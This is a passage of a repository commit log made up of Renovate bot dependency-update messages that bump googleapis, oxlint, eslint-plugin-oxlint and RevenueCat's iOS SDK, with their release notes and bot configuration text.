([fc21faf](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/fc21faf20d3f7a4a70c035cea20fc36082a247b9)) - **cloudidentity:** update the API ([3d288c6](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3d288c674958a8ece72b1bb73764b9549b3cbc1c)) - **cloudkms:** update the API ([93e0687](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/93e06878abf84ad8b1df3f12ace0f067b1f25098)) - **cloudprofiler:** update the API ([d11e9e4](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d11e9e41137ae8d062bd4ed084a350b0bde8d3c0)) - **cloudresourcemanager:** update the API ([76f0f51](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/76f0f511f97312e3aa7a41f14befa836ce44df55)) - **cloudscheduler:** update the API ([94305b7](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/94305b7da4ccfab0e63b613d6a7fcbe33864270d)) - **cloudsearch:** update the API ([e6de73d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e6de73da3a7cf1c269ef6017843ccf6fd078f154)) - **cloudshell:** update the API ([f399b75](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f399b75d0d63674a28970f589aea6f01eab1577b)) - **cloudtasks:** update the API ([31dbbe2](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/31dbbe2439fabe0f0fc1b8f3377a305fee87c2c0)) - **cloudtrace:** update the API ([212d697](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/212d697a0e2654ba1bb8f2775bf039b57be3a6cd)) - **composer:** update the API ([75304a0](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/75304a070d61822ec87af425147acf2a3e72afdf)) - **config:** update the API ([07be765](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/07be7657dd18a230d4e2390f156263a98fdae02a)) - **containeranalysis:** update the API ([90afb7b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/90afb7bddfde862f89ed2f599ca74bf8e2002e8c)) - **customsearch:** update the API ([dc6b156](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/dc6b156aaa9bcb1d45356db3c3a7058ed0720c04)) - **datacatalog:** update the API ([64c1abc](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/64c1abc7e78bbe9a213c1c696a83389ca1b8d313)) - **datafusion:** update the API ([6aff1d8](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/6aff1d8ecad16691a2b9d5ab4b5bfacf2680c8a0)) - **datalabeling:** update the API ([797471f](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/797471fb5f97302a1ab7f50587298aee650bf372)) - **datapipelines:** update the API ([e108596](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e10859679756d3c1fe243ade7b4ff096d4057f7a)) - **dataproc:** update the API ([abbcb61](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/abbcb618952a5c365ef553b83f88bd4fc6a19c68)) - **datastore:** update the API ([fe99c43](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/fe99c436b00f3e0db1c048b6e1978c2c91eeaf75)) - **deploymentmanager:** update the API ([87fda2a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/87fda2a3b88f81077ed5f18f52e0263644ba19cb)) - **dfareporting:** update the API ([4cec666](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4cec666a18587527e4973548112080ccafaa9e37)) - **digitalassetlinks:** update the API ([abe8c25](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/abe8c25a24e1c1e521338d1ece3f8124c08ed686)) - **docs:** update the API ([5c28cc5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5c28cc5f90c3ec07902952673a54a9439aebaefe)) - **domainsrdap:** update the API ([f3678df](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f3678df1b0f9621c9319be5c32b5c1ae0257409f)) - **doubleclicksearch:** update the API ([f6e9c9a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f6e9c9a07c6871be0b722532e09a1079fa2aa84d)) - **driveactivity:** update the API ([63563b6](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/63563b6d89ccdb8a778089c48a649d212ae41187)) - **drivelabels:** update the API ([44db39e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/44db39ea335d5b3566c1f6a751f32eb159427c6a)) - **drive:** update the API ([5f88b3e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5f88b3e4deaa2aa30bc78df0e5c2e9e387e7d161)) - **essentialcontacts:** update the API ([6bc249f](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/6bc249f5d12c4975f3569ad735fe6b14875960a7)) - **fcmdata:** update the API ([da072ae](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/da072ae63e796156028c0b28863adfef9d1887b8)) - **fcm:** update the API ([c2043ed](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c2043ed711270a5e38a0842b539898e9d289f436)) - **file:** update the API ([4bbf0b9](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4bbf0b92661f5ea47f09eefecf48238ab13980f1)) - **firebaseappcheck:** update the API ([851d463](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/851d4639bf75850c4ab88c1dad4dfd9166f9801b)) - **firebaseappdistribution:** update the API ([96163b7](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/96163b73f732144c3da840b18d6a55aac62d6081)) - **firebasedatabase:** update the API ([3d96170](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3d96170cc795827c84a53e0c3d0de526a12b9d95)) - **firebasedynamiclinks:** update the API ([1122f63](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/1122f63e79402abe5be53a38334c565ca883ad18)) - **firebasehosting:** update the API ([6abce84](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/6abce84cf7567d906dc94c64700c8bc42c55de4a)) - **firebaseml:** update the API ([eef0dfe](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/eef0dfe82ab1c082959cdb168d9c8e438b98606b)) - **firebaserules:** update the API ([d02b49c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d02b49c84908b0757a6525665b9451092c0ee3dd)) - **firebasestorage:** update the API ([b303956](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b303956d395587471344b89bf546068d89b6b1a8)) - **firebase:** update the API ([38f0247](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/38f024730891a3e566ac49a18dd2786768f8fe10)) - **fitness:** update the API ([bd72df1](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/bd72df18aba9c830b788a5ac4fd260ba693ce31d)) - **forms:** update the API ([e06cd96](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e06cd96538ce8a44d850c8cc29aabcdf0b180ab9)) - **gamesConfiguration:** update the API ([b26b164](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b26b16406b25d2cc66aeb21bbb4eb7d366c4f6ac)) - **gamesManagement:** update the API ([c056dbb](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c056dbb47b86bf807f7a536281f4ec9f715b1b3b)) - **gkeonprem:** update the API ([50b340a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/50b340ab8c56308486f8f47f15cf76c010300137)) - **gmailpostmastertools:** update the API ([2d1dd45](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2d1dd456fd959314d4dfdd5066f32304ca6534a4)) - **groupsmigration:** update the API ([2d5dfc8](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2d5dfc87a79567d6c65713279d9e169f791edd15)) - **groupssettings:** update the API ([81f7c45](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/81f7c4560d45065ccd96c24d05094c7b5de59580)) - **healthcare:** update the API ([4dcb153](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4dcb1532b818deed3e14b43d2e42de87d68a71ab)) - **homegraph:** update the API ([709f585](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/709f58538c74d97ac0508b3d5fd6518502401614)) - **iamcredentials:** update the API ([0610412](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/06104128540bdc9565a0cd8cdb812aafe4025ba2)) - **identitytoolkit:** update the API ([99534fb](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/99534fba8b394219448155ab565154cfa5710b15)) - **ids:** update the API ([5ad0d0b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5ad0d0ba7b827d5b24e69baa8ec6fb6aff738d2f)) - **indexing:** update the API ([3c4e15a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3c4e15a098c8cfaa8ac116046553bac0ca1cd7cb)) - **jobs:** update the API ([7687e7b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7687e7b88acbf1c0803bb9490593839728e013e5)) - **kgsearch:** update the API ([5a54be2](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5a54be26f5328c9a0b167cc06e4026358e1970df)) - **kmsinventory:** update the API ([3ac181b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3ac181bbd6283099b1ea29b1371c61eb0e211773)) - **language:** update the API ([91caf34](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/91caf3471150689b54fa2a51cde93de44c595df7)) - **libraryagent:** update the API ([50b72ef](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/50b72ef609e5c9058b5a03ed5aaa1b5062e4bf47)) - **licensing:** update the API ([b6f27e9](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b6f27e942a89e4597e1c212a700b26f51ddb7bf9)) - **lifesciences:** update the API ([fcc9aae](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/fcc9aaec76f6e1075e520b75118a9ca77a596dfb)) - **localservices:** update the API ([ca0c8d7](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ca0c8d7c7409cccbdf436d539119f093d3f62eec)) - **looker:** update the API ([0c067fa](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0c067fa5944b446b3b6766b57aec7ab646f08ba1)) - **managedidentities:** update the API ([1f430c5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/1f430c5ffd6aa522f4d99978a3a719918295a231)) - **manufacturers:** update the API ([d55ac4f](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d55ac4f151d006e4d975eede60e491877a706a93)) - **memcache:** update the API ([39c011c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/39c011c3681af3e906b370080a2ca8a6caf83fa0)) - **ml:** update the API ([bf42196](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/bf421969326b70fae5d4c6cddc432546004ec0f0)) - **mybusinessaccountmanagement:** update the API ([ce386e4](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ce386e47e08737a2252203bc30d39229d9be595a)) - **mybusinessbusinessinformation:** update the API ([cdaeb3b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/cdaeb3bc7d8a80dfee13dd0de6dbc5a6f93f5c7c)) - **mybusinesslodging:** update the API ([34eda38](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/34eda38c76099f2aa6b906505fb7f2b33c43cf26)) - **mybusinessnotifications:** update the API ([ae38037](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ae38037c11139e45813fd0306e3357129b036e1d)) - **mybusinessplaceactions:** update the API ([c9f5ea0](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c9f5ea0ebe9ee56b0c600367122f2f833fc82d33)) - **mybusinessqanda:** update the API ([9d43c1e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9d43c1e6ee4654d8bfff86aa44eee91c212e2aef)) - **mybusinessverifications:** update the API ([60bdbd2](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/60bdbd229b5a25345953be1eff11813b10840902)) - **networksecurity:** update the API ([b4ab725](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b4ab7254926c2a80445481f490eb9738a7399f93)) - **networkservices:** update the API ([0cf9456](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0cf9456b33165b03510406f5173f875aa67b15c8)) - **notebooks:** update the API ([71b9980](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/71b99805f4a3b99585c09a1b5442e2e43be45d13)) - **oauth2:** update the API ([db72d5d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/db72d5d788e26b83dac6603dd0c66280e48643fe)) - **osconfig:** update the API ([fc51160](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/fc5116090ac8e177af2cfe17ed5bb938d1f27470)) - **oslogin:** update the API ([d814cb9](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d814cb920dcb533086161c1e8cba819aa36b7c6d)) - **pagespeedonline:** update the API ([ea4b6e3](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ea4b6e327902369d129eab3b4433509d3e488c36)) - **people:** update the API ([d2f704e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d2f704e98cef30bc42636f7aa866bd0a2b586f20)) - **places:** update the API ([7dd5993](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7dd5993f4d5adbfd6eeed73bad1c066594fa8ffe)) - **playcustomapp:** update the API ([301c3ad](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/301c3adda469b043a7d0c632fb6b41f06c918a78)) - **playdeveloperreporting:** update the API ([7e73906](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7e7390622559837e06f16e7303d286eedf2a58ed)) - **playgrouping:** update the API ([9753005](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9753005a61f6aeaab0e433f2691b635508721923)) - **playintegrity:** update the API ([78dfca2](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/78dfca25343031a78ba17ce5a9f84b4b449ff3c3)) - **policyanalyzer:** update the API ([703ab7b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/703ab7bcbcd642386a483f5a70056a41b73f40ce)) - **policysimulator:** update the API ([4a7be29](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4a7be29e56b02985916e9a5e0563f4c447980134)) - **policytroubleshooter:** update the API ([a556194](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a556194c602dd8f577f043908a7647667c6ac3f4)) - **poly:** update the API ([12d5e41](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/12d5e413c9db34fc5c1c34ab4773499c5f8c9c3b)) - **prod\_tt\_sasportal:** update the API ([5dfac38](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5dfac38e84b1d21146a9fecd9ead4a04d81e19f8)) - **publicca:** update the API ([e7906c5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e7906c5b474e2303a50a91dd15b3c0ca37ffbff8)) - **pubsublite:** update the API ([f06ab43](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f06ab430e6095263623df08ac0ff727c9ec9c332)) - **rapidmigrationassessment:** update the API ([3fe4f53](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3fe4f53ee08c594ac96fbe126918d555910d962a)) - **readerrevenuesubscriptionlinking:** update the API ([c2996fa](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c2996fac1a3f5c48fa0a0be9fa2b8b070f0e0a66)) - **realtimebidding:** update the API ([e05daef](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e05daefcd22ec574a00043ba5dbc13e7097b9970)) - **recommendationengine:** update the API ([7b4553c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7b4553c671f92881f12ca6b0c6d13b9897cff259)) - **recommender:** update the API ([827d7fc](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/827d7fcf0b01ee4bb097d0e9b258dacfd903d4de)) - **reseller:** update the API ([3b0d62c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3b0d62ce52be031269cc38d461464fde58015af4)) - **resourcesettings:** update the API ([b499612](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b49961200508406ed5dc860b66d671a1598026b0)) - **runtimeconfig:** update the API ([f4f60c4](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f4f60c410d6d7a39d585a3f9711bd1e398cf1d42)) - **safebrowsing:** update the API ([ec3ca1a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ec3ca1abec9b9a90efafba0840ad34bcaf28a24c)) - **sasportal:** update the API ([a6a96bc](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a6a96bc8ee62e20c1dd078e8074b07ea523a58fd)) - **script:** update the API ([582352f](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/582352f283013f76babffc3f34de45aff10fb44e)) - **searchconsole:** update the API ([25ad1ff](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/25ad1ff213231bf47f909b48349a356b14d5dac6)) - **secretmanager:** update the API ([0d6d936](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0d6d93683ed834ad4414635c8408d1cbacda2c54)) - **servicedirectory:** update the API ([a550687](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a55068740ecafc29a193fe17a0d207e9becfdcac)) - **servicemanagement:** update the API ([74cb0a2](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/74cb0a2a62c6b29337808ad6fef57daf5c5afed5)) - **siteVerification:** update the API ([a0d8969](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a0d896969a6635f013a428cc58519075e58f7cfc)) - **slides:** update the API ([3e4be4b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3e4be4b9af47252b6b59de71255b08b2643f63df)) - **smartdevicemanagement:** update the API ([6ec4bd9](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/6ec4bd90d316f93cd12000ae76feb395c327100e)) - **solar:** update the API ([4377037](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4377037197348f7908f9c0a5937d2acd938ba2e5)) - **sourcerepo:** update the API ([0889507](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/088950701aeffc7aa8e6f2f17f955023e05494e1)) - **speech:** update the API ([504c8d0](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/504c8d07f3a9363908cdee44b31294d97087956d)) - **storagetransfer:** update the API ([aee9c44](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/aee9c449cf7b6592a91674d8acf83c3f24089b87)) - **storage:** update the API ([cd03772](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/cd037720cda614720bef7852812b1eb99d86d25f)) - **streetviewpublish:** update the API ([3a0401c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3a0401c216fd3c4bc8c11913572cf4f628df4813)) - **sts:** update the API ([bce176a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/bce176a17c9e5ff821d2e6a058720f9f744e18b4)) - **tagmanager:** update the API ([594c354](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/594c354031bb89976ac2b46054c2e0cf6bcd3ed0)) - **tasks:** update the API ([4203139](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4203139d06bd3b8487d1d0e2d29b92ba7d9a6975)) - **testing:** update the API ([5d373cc](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5d373cc08c089156b7ca26d52fd51c059e5c1227)) - **texttospeech:** update the API ([366a3fc](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/366a3fc5e1e88c28e0500dbd72970b52bfa442e0)) - **toolresults:** update the API ([ad28679](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ad28679c983fdc6df90a2cfa73175f7d6f41c741)) - **transcoder:** update the API ([1799ca0](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/1799ca0e2b6c03a21e2dfecfcdd20efaf866222f)) - **translate:** update the API ([6ef599c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/6ef599c831d7a797b797faf3736ac6514d6bf5c0)) - **travelimpactmodel:** update the API ([be498cd](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/be498cde964258f31edd0d32e5032555b4bf0211)) - **vault:** update the API ([cb9bc44](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/cb9bc4432053217aa68d18b283d55a4ca553617f)) - **versionhistory:** update the API ([0e4d78e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0e4d78e3b4fdd766a38662bd270453080efd804d)) - **videointelligence:** update the API ([8139c6a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/8139c6a6a353c42b878ba2c5751071ecaa06eff0)) - **vision:** update the API ([c6585c7](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c6585c79b039060193405d68e865552f579dae19)) - **vmmigration:** update the API ([2664ee2](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2664ee2f9c1f01d51d8545f4cab82535fac59846)) - **vmwareengine:** update the API ([fcdd0d9](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/fcdd0d9cc42e7e7b34ec2b431f94043cde95b8e3)) - **vpcaccess:** update the API ([fe1b7f5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/fe1b7f52025c36cd63df1b874d1303ab8e13abab)) - **walletobjects:** update the API ([58fe19c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/58fe19cf6606af287f80afa88f6846a0df9a23c6)) - **webfonts:** update the API ([bd5115d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/bd5115dbc9c1bdb337f078cfac36bbc5143e41de)) - **webrisk:** update the API ([e227c8e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e227c8ed85845dfaf4aa51b0dd727d53a1a5f9cc)) - **websecurityscanner:** update the API ([3e1d63b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3e1d63b7ab93ca294ec0c983851321bc2fb85338)) - **workflowexecutions:** update the API ([3329041](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3329041d025edb6a14756e9f15324f6265e7a1e2)) - **workflows:** update the API ([b75aa48](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b75aa48a774260202f951f0b0b45255c8b346d69)) - **workspaceevents:** update the API ([78acf6b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/78acf6bdcb0197c34bc4f7950ed4bf351d386b59)) - **youtubeAnalytics:** update the API ([5fdf519](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5fdf519aebe3d4dfaa7fd477d1121dbc9bd1280f)) - **youtubereporting:** update the API ([87c5dcc](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/87c5dcc04c98a5defa4a271125cd5a248eca800a)) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMDYuMSIsInVwZGF0ZWRJblZlciI6IjQzLjIwNi4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
f98688f6c7 |
chore: bump up oxlint to v1.68.0 (#15071)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [oxlint](https://oxc.rs/docs/guide/usage/linter) ([source](https://redirect.github.com/oxc-project/oxc/tree/HEAD/npm/oxlint)) | [`1.67.0` → `1.68.0`](https://renovatebot.com/diffs/npm/oxlint/1.67.0/1.68.0) |  |  | --- ### Release Notes <details> <summary>oxc-project/oxc (oxlint)</summary> ### [`v1.68.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1680---2026-06-01) [Compare Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.67.0...oxlint_v1.68.0) ##### 🚀 Features - [`e4b1f46`](https://redirect.github.com/oxc-project/oxc/commit/e4b1f46) linter/typescript: Implement `method-signature-style` rule ([#​22679](https://redirect.github.com/oxc-project/oxc/issues/22679)) (Mikhail Baev) - [`bc462ca`](https://redirect.github.com/oxc-project/oxc/commit/bc462ca) linter/vue: Implement no-reserved-component-names rule ([#​22741](https://redirect.github.com/oxc-project/oxc/issues/22741)) (bab) - [`ef9e751`](https://redirect.github.com/oxc-project/oxc/commit/ef9e751) linter/vue: Implement component-definition-name-casing rule ([#​22818](https://redirect.github.com/oxc-project/oxc/issues/22818)) (bab) - [`d67f51a`](https://redirect.github.com/oxc-project/oxc/commit/d67f51a) linter/vue: Implement require-prop-type-constructor rule ([#​22708](https://redirect.github.com/oxc-project/oxc/issues/22708)) (bab) - [`8422e8b`](https://redirect.github.com/oxc-project/oxc/commit/8422e8b) linter/jsdoc: Implement `require-yields-description` rule ([#​22805](https://redirect.github.com/oxc-project/oxc/issues/22805)) (Mikhail Baev) - [`fe93f97`](https://redirect.github.com/oxc-project/oxc/commit/fe93f97) linter/eslint: Implement `prefer-named-capture-group` rule ([#​22759](https://redirect.github.com/oxc-project/oxc/issues/22759)) (Sebastian Poxhofer) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMDkuMCIsInVwZGF0ZWRJblZlciI6IjQzLjIwOS4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
8c0e1ba04e |
chore: bump up linter to v1.68.0 (#15069)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [eslint-plugin-oxlint](https://redirect.github.com/oxc-project/eslint-plugin-oxlint) | [`1.67.0` → `1.68.0`](https://renovatebot.com/diffs/npm/eslint-plugin-oxlint/1.67.0/1.68.0) |  |  | --- ### Release Notes <details> <summary>oxc-project/eslint-plugin-oxlint (eslint-plugin-oxlint)</summary> ### [`v1.68.0`](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/releases/tag/v1.68.0) [Compare Source](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.67.0...v1.68.0) *No significant changes* ##### [View changes on GitHub](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.67.0...v1.68.0) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMDYuMSIsInVwZGF0ZWRJblZlciI6IjQzLjIwOS4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
5b9d51b41b |
chore: bump up RevenueCat/purchases-ios-spm version to from: "5.75.0" (#15048)
This PR contains the following updates: | Package | Update | Change | |---|---|---| | [RevenueCat/purchases-ios-spm](https://redirect.github.com/RevenueCat/purchases-ios-spm) | minor | `from: "5.74.0"` → `from: "5.75.0"` | --- ### Release Notes <details> <summary>RevenueCat/purchases-ios-spm (RevenueCat/purchases-ios-spm)</summary> ### [`v5.75.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.74.0...5.75.0) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.74.0...5.75.0) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMDIuMSIsInVwZGF0ZWRJblZlciI6IjQzLjIwMi4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
18471ef9b2 |
chore: bump up oxlint version to v1.67.0 (#15047)
